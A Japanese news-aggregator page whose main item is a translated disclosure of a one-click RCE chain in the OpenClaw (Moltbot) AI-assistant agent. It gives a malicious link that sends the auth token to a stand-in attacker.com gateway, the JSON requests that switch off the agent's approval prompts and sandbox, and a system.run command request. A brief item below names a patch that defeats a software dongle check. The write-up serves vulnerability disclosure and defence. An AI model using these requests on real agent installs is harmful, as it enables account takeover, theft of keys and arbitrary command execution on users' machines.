RCE をクリックすると、Moltbot のデータやキーが盗まれます。

2026/02/02 4:47

RCE をクリックすると、Moltbot のデータやキーが盗まれます。

RSS: https://news.ycombinator.com/rss

要約

Japanese Translation:


要約

OpenClaw(旧 Moltbot/ClawdBot)は、10万人以上の開発者に信頼されているオープンソースAIパーソナルアシスタントであり、1クリックだけで攻撃者が完全な管理権限を取得できる重大なロジック欠陥があります。
この攻撃は3段階で進行します:

  1. 取り込み – 悪意あるURLに
    gatewayUrl
    クエリパラメータが含まれます。
  2. 接続 – OpenClaw は即座に
    connectGateway()
    を呼び出し、攻撃者制御のゲートウェイへ WebSocket 接続を開きます。
  3. トークン流出 – authToken が自動的に WebSocket ハンドシェイクで送信されます。OpenClaw は Origin ヘッダーを検証しないため、localhost 接続でも(Cross‑Site WebSocket Hijacking)です。

盗まれたトークンは

operator.admin
operator.approvals
を付与し、攻撃者は以下のことが可能になります:

  • exec.approvals.set
    で安全プロンプトを無効化
  • config.patch
    をパッチして
    tools.exec.host
    を “gateway” に設定し、コンテナ化された実行を回避
  • 任意のコマンドを実行(例:
    node.invoke
    system.run

この欠陥は v2026.1.24‑1 以前のすべての OpenClaw バージョンで利用可能です。 depthfirst General Security Intelligence と別の研究者により独立して発見され、GitHub Advisory を通じて公開されています。

対策:
近日リリース予定のパッチではゲートウェイURL用の確認ダイアログを追加し、自動接続機能を削除します。ユーザーは直ちにアップグレードし、漏洩の可能性があるトークンをローテーションし、疑わしいゲートウェイ活動を監視してローカルシステム乗っ取り・データ侵害・妨害行為を防止してください。

本文

テック界で最も注目されるエージェント、OpenClaw(旧 Moltbot & ClawdBot)をハッキングする方法
自分の代わりに行動できるオープンソースAIパーソナルアシスタントは現在X上で最も話題になっているテーマです。iMessage/WhatsApp/Slack へのアクセスから、ローカルコンピュータを無制限に操作するまで、10万件以上の開発者がデジタルライフの鍵として信頼しています。

エージェントが「ゴッドモード」権限を取得すると、ミスの余地はゼロになります。コミュニティはその機能を祝福しつつ、depthfirst の一般セキュリティインテリジェンスチームはこっそりコードを監査し、重大な脆弱性を発見しました。私はこの指摘を調査し、さらに別の欠陥と組み合わせて 1‑クリックでリモートコード実行(RCE)できるエクスプロイトを作成しました。悪意あるウェブページにアクセスするだけで、あなたのコンピュータ および AI アシスタントを同時にハックできます。

以下では、depthfirst が明らかにしたロジック欠陥と、それを武器化するために構築した正確なキルチェーンを解説します。


depthfirst が脆弱性を指摘した経緯

  1. インジェスト

    app-settings.ts
    は URL のクエリパラメータとして渡された
    gatewayUrl
    をそのまま受け取り、ストレージに永続化します。

    const gatewayUrlRaw = params.get("gatewayUrl");
    if (gatewayUrlRaw != null) {
      const gatewayUrl = gatewayUrlRaw.trim();
      if (gatewayUrl && gatewayUrl !== host.settings.gatewayUrl) {
        applySettings(host, { ...host.settings, gatewayUrl }); // saveSettings → localStorage で永続化
      }
    }
    
  2. 処理

    app-lifecycle.ts
    は設定が適用された直後に
    connectGateway()
    を呼び出します。

    handleConnected(host) {
      …
      connectGateway(host); // URL パラメータ解析後すぐに実行
      startNodesPolling(host);
      …
    }
    
  3. プロトコル実行

    gateway.ts
    は認証トークンを自動的に新しいゲートウェイへの接続ハンドシェイクにバンドルします。

    const params = { /* … */, authToken, locale: navigator.language };
    void this.request<GatewayHelloOk>("connect", params);
    

それぞれは単独では安全ですが、組み合わせると「URL をクリックするだけで接続を強制し、認証トークンを漏洩させる」という重大なセキュリティ問題が発生します。depthfirst の UI プレビューには次のように記載されています。

1‑Click RCE エクスプロイト キルチェーン
限定的直接攻撃


限定的直接攻撃

エクスプロイト手順は以下です:

  1. 被害者が悪意あるリンクをクリック(またはリダイレクト)します。例:
    http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080
  2. 攻撃者の WebSocket サーバーが認証トークンを受信します。
  3. 攻撃者は盗まれたトークンで被害者の OpenClaw インスタンスにログインします。

攻撃者は個人データへアクセスし、被害者になりすまして行動(テキストメッセージ閲覧、Stripe API キー取得等)を実行できます。

制限事項

  • ローカルで稼働している OpenClaw インスタンスには作用しません。
  • 防御サンドボックスや安全ガードレールはバイパスできません。
  • 任意コード実行は達成できません。

制限を克服する手段

1. localhost ネットワーク制限の回避

ほとんどのユーザーは

localhost
上で OpenClaw を動かします。正しい認証トークンがあっても、Same Origin Policy(SOP)のために攻撃者はアクセスできません。ただし:

  • ブラウザは HTTP 接続には SOP を適用する一方、WebSocket には適用しない
  • OpenClaw の WebSocket サーバーは
    Origin
    ヘッダーを検証せず、任意のサイトからのリクエストを受け入れます。

これにより クロスサイト WebSocket ハイジャック(CSWSH) が可能になります。
被害者が

attacker.com
を訪れると、ブラウザ内で JavaScript を実行し
ws://localhost:18789
へ接続します。ブラウザは
attacker.com
とローカル OpenClaw の間のピボットとなります。

2. サンドボックスからの脱出

OpenClaw の安全機能(例:

exec-approvals.json
、コンテナ化されたシェルツール)は API を介して制御されます。盗まれたトークンは
operator.admin
operator.approvals
スコープを付与し、次の操作が可能になります:

  • ユーザー確認を無効化

    exec.approvals.set
    リクエストで
    ask: "off"
    を設定。

    {
      "method": "exec.approvals.set",
      "params": { "defaults": { "security": "full", "ask": "off" } }
    }
    
  • コンテナを無効化

    config.patch
    リクエストで
    tools.exec.host
    "gateway"
    に設定し、コマンドをホスト上で直接実行。

3. 任意コマンド実行

最後に

node.invoke
リクエストを送信します:

{
  "type": "req",
  "id": "4",
  "method": "node.invoke",
  "params": {
    "nodeId": "main",
    "command": "system.run",
    "params": { "cmd": "bash -c 'echo hacked > /tmp/hacked'" },
    "timeoutMs": 60000,
    "idempotencyKey": "rev1"
  }
}

これらはすべて、被害者が悪意あるページにアクセスしてから数ミリ秒で完了します。入力やプロンプトは不要です。


開示とパッチ

OpenClaw チームは私の報告を受けて迅速に問題を修正しました。GitHub Advisory には次のように記載されています:

  • ゲートウェイ URL 確認モーダルが追加され、プロンプトなしで自動接続する挙動が排除されました。
  • v2026.1.24-1
    以前のすべてのバージョンが脆弱です。

OpenClaw をアップグレードし、トークンが漏洩している可能性がある場合はローテーションを行ってください。


最後に

depthfirst は攻撃者が発見する前に論理欠陥を検出するインテリジェンス層を構築しています。コードを公開しているなら、ぜひご相談ください。

同じ日のほかのニュース

一覧に戻る →

2026/02/02 2:36

Apple I 広告(1976年)

## Japanese Translation: Apple Computerの新しいマイクロコンピュータは、単一ボードに収まり、$666.66で販売されるコンパクトなオールインワン「ハッスルフリー」システムです。MOS 6502プロセッサ、16個の4 Kチップから構成された8 KダイナミックRAM、960文字を24×40で表示し自動スクロールが可能な統合ビデオターミナル(RFモジュレータ経由でテレビに接続できる)と独自の1 Kビデオメモリを使用しています。ユニットには内蔵電源が備わっており、大容量28アンペアの電源、スイッチ、LEDは不要です。大型テレタイプ機械と比べてサイズ・コスト・保守性を削減し、出力速度は6倍に速く、Apple BASICがタープレートにプリロードされており、オプションソフトウェアもほぼ無料または無償で提供されます。予定されたアップグレードとしては、32 KオンボードRAMオプションのため16 Kチップへの切替とエッジコネクタを介した65 Kまでの拡張があり、キャセットインターフェースは縦型コネクタに接続し1500 bpsでデータ転送(約20秒で4 Kバイトの読み書き)を行います。ファームウェアはPROMに格納されており、16進入力・デバッグ・画面上直接印刷が可能です。Apple Computerは既に主要コンピュータストアで在庫があり、小売業者や販売代理店はホビイストや小規模事業者へ手頃で保守不要なコンピュータを簡単に供給できます。

2026/02/02 6:30

「40年にわたるコピー保護ドングルを打ち破る」

## Japanese Translation: > 著者は、2026年のWindows 98会計事務所で使用されていたSoftware West社の1990年代製RPG IIコンパイラが、並列ポート用ハードウェアコピー保護ドングルを必要としていることを発見しました。`RPGC.EXE`とそのエディタ`SEU.EXE`は両方ともドングルの有無を確認します。ドングルがない場合、SEUは数秒後に「No dongle, no edit.」というメッセージで終了します。 > アセンブルコードを見ると、セグメント0800内に0x90バイトのルーチンがあり、並列ポートへのIN/OUTを行い、定数値(`BX`、ここでは`BH=76h`)を返しています。このルーチンを`MOV BX, 7606h`(バイト列 `BB 06 76 CB`)に書き換えるとドングルチェックが回避され、SEUは即座に終了します。 > 全てのコンパイラ実行ファイルには同一のコピー保護ロジックが含まれているため、この4バイトのパッチを適用すると、ハードウェアなしでコンパイラがパッチ済み出力バイナリを生成できるようになります。保護は単に定数番号を検証するだけであり、容易に破棄可能です。個人データを削除すれば、このコンパイラは無料の歴史的アーティファクトとして公開されます。

2026/02/01 22:56

**アドベンチャーゲーム・スタジオ** *冒険ゲームを制作するための OSS ソフトウェア。*

## Japanese Translation: Adventure Game Studio(AGS)は、誰でもグラフィカルなポイント&クリック冒険ゲームを作成できる無料のオープンソースソフトウェアです。Windows上でスタンドアロンIDEとして動作し、画像のインポート、スクリプト作成、およびテスト用の統合ツールが提供されます。AGSで構築されたゲームはLinux、iOS、Androidへデプロイできます。このエンジンはすべてのスキルレベルの開発者をサポートし、フォーラム(「初心者技術質問」「冒険関連トーク&チャット」「ザ・ランプス・ルーム」)、Facebookページ、Discordサーバー、およびローカルミートアップで支援を提供する活発なコミュニティに裏付けられています。ユーザーはAGSウェブサイトにプロジェクトをアップロードして公開できます。 最近のタイトルには「Brainrot!」(2026年2月1日)、 「Nothmere」(2026年1月31日)、「If On A Winter's Night, Four Travelers」(8番目のAGS賞受賞者)および「Technobabylon」(9番目のAGS賞受賞者)が含まれます。コミュニティはボランティアによって維持され、サーバーとフォーラムの費用を個人の資金で賄い、サービスを無料に保っています。PayPalで寄付が受け付けられており、サーバーコストをカバーした後、残余収益はミッテンズなどのコミュニティイベントへ再投資されます。